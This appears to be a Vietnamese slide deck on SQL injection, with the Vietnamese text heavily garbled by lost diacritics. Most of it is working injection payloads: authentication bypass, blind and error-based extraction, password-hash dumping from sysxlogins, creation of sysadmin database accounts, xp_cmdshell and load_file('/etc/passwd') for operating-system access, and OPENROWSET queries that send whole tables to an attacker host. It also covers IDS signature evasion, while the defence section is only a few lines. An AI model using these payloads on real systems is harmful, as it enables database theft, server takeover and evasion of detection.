Professional Documents
Culture Documents
1/ Gii thiu s lc v SQL. 2/ Tm hiu SQL Injection. 3/ Cc phng php ca SQL Injection. 4/ K thut trn (Evasion Techniques) 5/ Phng php phng trnh.
2
What is SQL?
SQL, vit tt ca Structured Query Language (ngn ng hi c cu trc). Cng c s dng t chc, qun l v truy xut d liu uc lu tr trong cc c s d liu. SQL c th:
Thc hin cc truy vn i vi c s d liu. Ly d liu t c s d liu. Chn table mi trong mt c s d liu. Xa thng tin trong c s d liu. Cp nht cc table trong c s d liu.
4
SQL
C rt nhiu phin bn khc nhau ca ngn ng SQL : Oracle, MSSQL, MySQL Chng h tr cng cc ngn ng thao tc d liu nh (SELECT, UPDATE, DELETE, INSERT, WHERE).
1 2 3
SQL Queries
Vi SQL, chng ta c th truy vn CSDL v c mt kt qu tr v. S dng li table trc, truy vn s th ny:
SELECT LastName FROM users WHERE UserID = 1;
SQL INJECTION L G ?
SQL injection l mt k thut cho php nhng k tn cng li dng l hng trong vic kim tra d liu nhp trong cc ng dng web v cc thng bo li ca h qun tr c s d liu Inject v thi hnh cc cu lnh SQL bt hp php.
N PH BIN TH NO?
Ngy nay c nhiu website d b tn cng. y l l hng trong pht trin ng dng web, n khng phi li ca DB hay ca web server. Hu ht cc lp trnh vin vn cha nhn thc c vn ny. Rt nhiu gii php c a ln mng nhng vn khng tt.
10
L hng ca ng dng
Hu nh tt c cc database SQL v ngn ng lp trnh u c kh nng d b tn cng.
MS SQL Server, Oracle, MySQL, Postgres, DB2, MS Access, Sybase, Informix, etc
Perl and CGI scripts that access databases ASP, JSP, PHP XML, XSL and XSQL Javascript VB, MFC, and other ODBC-based tools and APIs DB specific Web-based applications and APIs Reports and DB Applications 3 and 4GL-based languages (C, OCI, Pro*C, and COBOL)
11
12
Tnh nng ca
ng cc tham s chui Tt c sau u c xem l mt phn lnh SQL. String fields rt thng dng nhng c mt s kiu khc ca fields.
Numeric Dates
14
Tn cng vo numberic
$formacct = 1 or 1=1 # $formpin = 1111 Truy vn cui cng:
SELECT * FROM clients WHERE account = 1 or 1=1 # AND pin = 1111
16
17
18
Content
1/ Input Validation 2/ Information gathering 3/ 1=1 Attacks 4/ Extracting Data 5/ OS Interaction 6/ OS Cmd Prompt 7/ Expand Influence
19
2) Info. Gathering
3) 1=1 Attacks
5) OS Interaction
4) Extracting Data
6) OS Cmd Prompt
7) Expand Influence
20
1) Input Validation
1) Input Validation 2) Info. Gathering
3) 1=1 Attacks
5) OS Interaction
4) Extracting Data
6) OS Cmd Prompt
7) Expand Influence
21
Bng Fuzzing:
Chui k t: ' " ) # || + > SQL reserved words with white space delimiters
%09select (tab%09, carriage return%13, linefeed%10 and space%32 with and, or, update, insert, exec, etc)
Truy vn tr hon (Delay query) ' waitfor delay '0:0:10'-22
2) Information gathering
1) Input Validation
2) Info. Gathering
23
2) Information gathering
C ch u ra. Hiu c nhng truy vn. Xc nh loi hnh c s d liu. Tm ra cp c quyn ca ngi s dng. Xc nh mc tng tc h iu hnh.
24
a) C ch u ra
S dng kt qu truy vn trong ng dng web. Error Messages Blind SQL Injection
S dng time delays hay error signatures xc nh trch xut thng tin. Chng ta c th thc hin nhiu iu nhng phng php blind Injection chm v kh khn.
Cc c ch
e-mail, SMB, FTP, TFTP
25
Li trch xut thng tin thng qua tin nhn (Error messages)
Grouping Error
' group by columnnames having 1=1 - -
26
Blind Injection
S dng kt qu bit.
' and condition and '1'='1
'; if condition waitfor delay '0:0:5' - '; union select if( condition , benchmark (100000, sha1('test')), 'false'),1,1,1,1;
Ngoi ra, chng ta c s dng tt c cc kiu truy vn nhng phi l cc thng tin khng c li. Ta s nhn c cu tr li Yes/No.
Trch xut thng tin dng vn bn bng cch chuyn i thnh m ASCII v sau chuyn t ASCII sang nh phn v sau chng ta s nhn c 1 bit. Rt tn thi gian nhng kh thi vi cng c t ng nh SQueal
27
b) Nhng truy vn
Truy vn c th l:
SELECT UPDATE EXEC INSERT Hoc ci g phc tp hn.
Context helps
Form hay Page no chng ta mun truy vn vi d liu u vo ca chng ta? Tn ca field, cookie hay tham s l g?
28
SELECT Statement
Hu ht cc Injections s c t gia lnh SELECT. Trong mnh SELECT, hu ht chng ta u kt thc bng WHERE:
SELECT *
FROM table WHERE x = 'normalinput' group by x having 1=1 -GROUP BY x HAVING x = y ORDER BY x
29
UPDATE statement
Trong phn thay i password ca app chng ta c th c nhng iu sau:
UPDATE users
SET password = ' new password' WHERE login = logged.user AND password = 'old password'
Nu inject vo new password v fix trong phn cn li, bn s thay i mi mt khu trong table.
30
2. To ra cc li c th.
Xc nh tn ca table and column ' group by columnnames having 1=1 - Do we need parenthesis? Is it a subquery?
31
Is it a stored procedure?
Chng ti s dng cc Injections khc nhau xc nh nhng iu c th hoc khng th lm.
,@variable ?Param1=foo&Param2=bar PRINT PRINT @@variable
32
Tricky Queries
Khi ta ang trong mt phn ca subquery hay lnh khi u hoc lnh kt thc.
Ta s cn s dng cc thng s thot ra. Mt s chc nng khng c sn trong subqueries (v d: group by, having and further subqueries) Trong mt s trng hp ta s cn thm vo END.
Li pht sinh trong truy vn c th lm gin on hoc c th lm ngng hng lot cc truy vn ca ta. Mt s truy vn are simply not escapable!
33
34
Mt s khc bit
35
36
and 1 in (select user ) - '; if user ='dbo' waitfor delay '0:0:5 '- ' union select if( user() like 'root@%', benchmark(50000,sha1('test')), 'false' );
37
DB Administrators
Default administrator accounts bao gm:
sa, system, sys, dba, admin, root and many others
38
3) 1=1 Attacks
1) Input Validation 2) Info. Gathering
7) Expand Influence
39
Khm ph cu trc DB
Xc nh tn ca table v column. ' group by columnnames having 1=1 - Xc nh tn kiu ca column. ' union select sum(columnname ) from tablename - Lit k table user c nh ngha.
' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') -40
42
Database Enumeration
Trong MS SQL Server, cc c s d liu c th c truy vn vi master .. Sysdatabases
CSDL khc trong Server
' and 1 in (select min(name ) from master.dbo.sysdatabases where name >'.' ) --
V tr File ca CSDL
' and 1 in (select min(filename ) from master.dbo.sysdatabases where filename >'.' ) --
43
System Tables
Oracle
SYS.USER_OBJECTS SYS.TAB SYS.USER_TEBLES SYS.USER_VIEWS SYS.ALL_TABLES SYS.USER_TAB_COLUMNS SYS.USER_CATALOG
MS Access
MsysACEs MsysObjects MsysQueries MsysRelationships
MySQL
mysql.user mysql.host mysql.db
MS SQL Server
sysobjects syscolumns systypes sysdatabases
44
4) Extracting Data
1) Input Validation 2) Info. Gathering
7) Expand Influence
45
Password grabbing
Grabbing username and passwords from a User Defined table
'; begin declare @var varchar(8000) set @var=':' select @var=@var+' '+login+'/'+password+' ' from users where login>@var select @var as var into temp end - ' and 1 in (select var from temp) - ' ; drop table temp -46
Create DB Accounts
MS SQL MySQL Access
exec sp_addlogin 'victor', 'Pass123' exec sp_addsrvrolemember 'victor', 'sysadmin' INSERT INTO mysql.user (user, host, password) VALUES ('victor', 'localhost', PASSWORD('Pass123')) CREATE USER victor IDENTIFIED BY 'Pass123' Postgres (requires UNIX account) CREATE USER victor WITH PASSWORD 'Pass123' CREATE USER victor IDENTIFIED BY Pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users; GRANT CONNECT TO victor; GRANT RESOURCE TO victor;
Oracle
47
48
What do we do?
The hashes are extracted using SELECT password FROM master..sysxlogins We then hex each hash begin @charvalue='0x', @i=1, @length=datalength(@binvalue), @hexstring = '0123456789ABCDEF' while (@i<=@length) BEGIN declare @tempint int, @firstint int, @secondint int select @tempint=CONVERT(int,SUBSTRING(@binvalue,@i,1)) select @firstint=FLOOR(@tempint/16) select @secondint=@tempint - (@firstint*16) select @charvalue=@charvalue + SUBSTRING (@hexstring,@firstint+1,1) + SUBSTRING (@hexstring, @secondint+1, 1) select @i=@i+1 END And then we just cycle through all passwords
49
y l mt lnh di:
'; begin declare @var varchar(8000), @xdate1 datetime, @binvalue varbinary(255), @charvalue varchar(255), @i int, @length int, @hexstring char(16) set @var=':' select @xdate1=(select min(xdate1) from master.dbo.sysxlogins where password is not null) begin while @xdate1 <= (select max(xdate1) from master.dbo.sysxlogins where password is not null) begin select @binvalue=(select password from master.dbo.sysxlogins where xdate1=@xdate1), @charvalue = '0x', @i=1, @length=datalength(@binvalue), @hexstring = '0123456789ABCDEF' while (@i<=@length) begin declare @tempint int, @firstint int, @secondint int select @tempint=CONVERT(int, SUBSTRING(@binvalue,@i,1)) select @firstint=FLOOR(@tempint/16) select @secondint=@tempint - (@firstint*16) select @charvalue=@charvalue + SUBSTRING (@hexstring,@firstint+1,1) + SUBSTRING (@hexstring, @secondint+1, 1) select @i=@i+1 end select @var=@var+' | '+name+'/'+@charvalue from master.dbo.sysxlogins where xdate1=@xdate1 select @xdate1 = (select isnull(min(xdate1),getdate()) from master..sysxlogins where xdate1>@xdate1 and password is not null) end select @var as x into temp end end -50
51
52
Transfer DB
'; insert into OPENROWSET('SQLoledb', 'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80; ', 'select * from mydatabase..table1') select * from database..table1 -'; insert into OPENROWSET('SQLoledb', 'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80; ', 'select * from mydatabase..table2') select * from database..table2 -55
5) OS Interaction
1) Input Validation
2) Info. Gathering
3) 1=1 Attacks
5) OS Interaction
4) Extracting Data
6) OS Cmd Prompt
7) Expand Influence
56
Tm kim passwords v cu hnh files Thay i passwords and cu hnh Thc thi commands bng cch ghi ln cc cu hnh files v files khi to.
MySQL OS Interaction
MySQL
LOAD_FILE
' union select 1,load_file('/etc/passwd'),1,1,1;
58
MS SQL OS Interaction
MS SQL Server '; exec master..xp_cmdshell 'ipconfig > test.txt' - '; CREATE TABLE tmp (txt varchar(8000)); BULK INSERT tmp FROM 'test.txt' - '; begin declare @data varchar(8000) ; set @data='| ' ; select @data=@data+txt+' | ' from tmp where txt<@data ; select @data as x into temp end - ' and 1 in (select substring(x,1,256) from temp) - '; declare @var sysname; set @var = 'del test.txt'; EXEC master..xp_cmdshell @var; drop table temp; drop table tmp --
59
Kin trc
ghi nh. Injection ca chng ta hu ht s c thc thi trn nhng server khc nhau. DB server c th khng c quyn truy cp Internet.
Web Server Application Server Database Server
Nhng kt ni ngc.
nslookup, ping ftp, tftp, smb
61
Reverse Pings
'; exec master..xp_cmdshell 'ping MyIP' --
OPENROWSET
'; select * from OPENROWSET( 'SQLoledb', 'uid=sa; pwd=Pass123; Network=DBMSSOCN; Address=MyIP,80;', 'select * from table')
62
Network Reconnaissance
S dng xp_cmdshell tt c s c thc thi nh sau:
Ipconfig /all Tracert myIP arp -a nbtstat -c netstat -ano route print
63
6) OS Cmd Prompt
1) Input Validation
2) Info. Gathering
3) 1=1 Attacks
5) OS Interaction
4) Extracting Data
6) OS Cmd Prompt
7) Expand Influence
65
Jumping to the OS
Linux based MySQL
' union select 1, (load_file('/etc/passwd')),1,1,1;
Starting Services
'; exec master..xp_servicecontrol 'start','FTP Publishing' -66
67
7) Expand Influence
1) Input Validation
2) Info. Gathering
3) 1=1 Attacks
5) OS Interaction
4) Extracting Data
6) OS Cmd Prompt
7) Expand Influence
69
S dng lnh nhy OPENROWSET nhng server c th d dng t c. Cng mt cch m ta s dng trc vi vic s dng OPENROWSET i vi kt ni ngc.
70
Linked Servers
'; insert into OPENROWSET('SQLoledb', 'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;', 'select * from mydatabase..hacked_sysservers') select * from master.dbo.sysservers '; insert into OPENROWSET('SQLoledb', 'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;', 'select * from mydatabase..hacked_linked_sysservers') select * from LinkedServer.master.dbo.sysservers '; insert into OPENROWSET('SQLoledb', 'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;', 'select * from mydatabase..hacked_linked_sysdatabases') select * from LinkedServer.master.dbo.sysdatabases
71
74
Cui cng ta concatenate the binaries and dump the file to disk.
75
76
Content
Evasion Techniques IDS Signature Evasion Input validation Evasion and Circumvention MySQL Input Validation Circumvention using Char() IDS Signature Evasion using white spaces IDS Signature Evasion using comments IDS Signature Evasion using string concatenation IDS and Input Validation Evasion using variables
77
Evasion Techniques
nh la s xc nhn u vo v nhng k thut IDS Evasion cng tng t. S pht hin da trn Snort ca SQL Injection mt phn l c th nhng tr li da trn "signatures. Signatures c th b du d dng. Xc nhn u vo, IDS detection v strong database v OS hardening phi c s dng cng nhau.
78
iu ny c th du i d dng bng cch s dng s thay th cho mt s k t trc trong numeric field.
80
81
84
MS SQL
'; EXEC ('SEL' + 'ECT US' + 'ER')
85
86
Nh vy, c th thy li SQL injection khai thc nhng bt cn ca cc lp trnh vin pht trin ng dng web khi x l cc d liu nhp vo xy dng cu lnh SQL. Tc hi t li SQL injection ty thuc vo mi trng v cch cu hnh h thng. Nu ng dng s dng dbo khi thao tc d liu, n c th xa ton b cc bng d liu, to cc bng d liu mi. Nu ng dng s dng quyn sa n c th iu khin ton b h qun tr database => iu khin h thng ca bn
87
88
Content
Kim sot cht ch d liu nhp vo. Thit lp cu hnh an ton cho h qun tr c s d liu.
89
92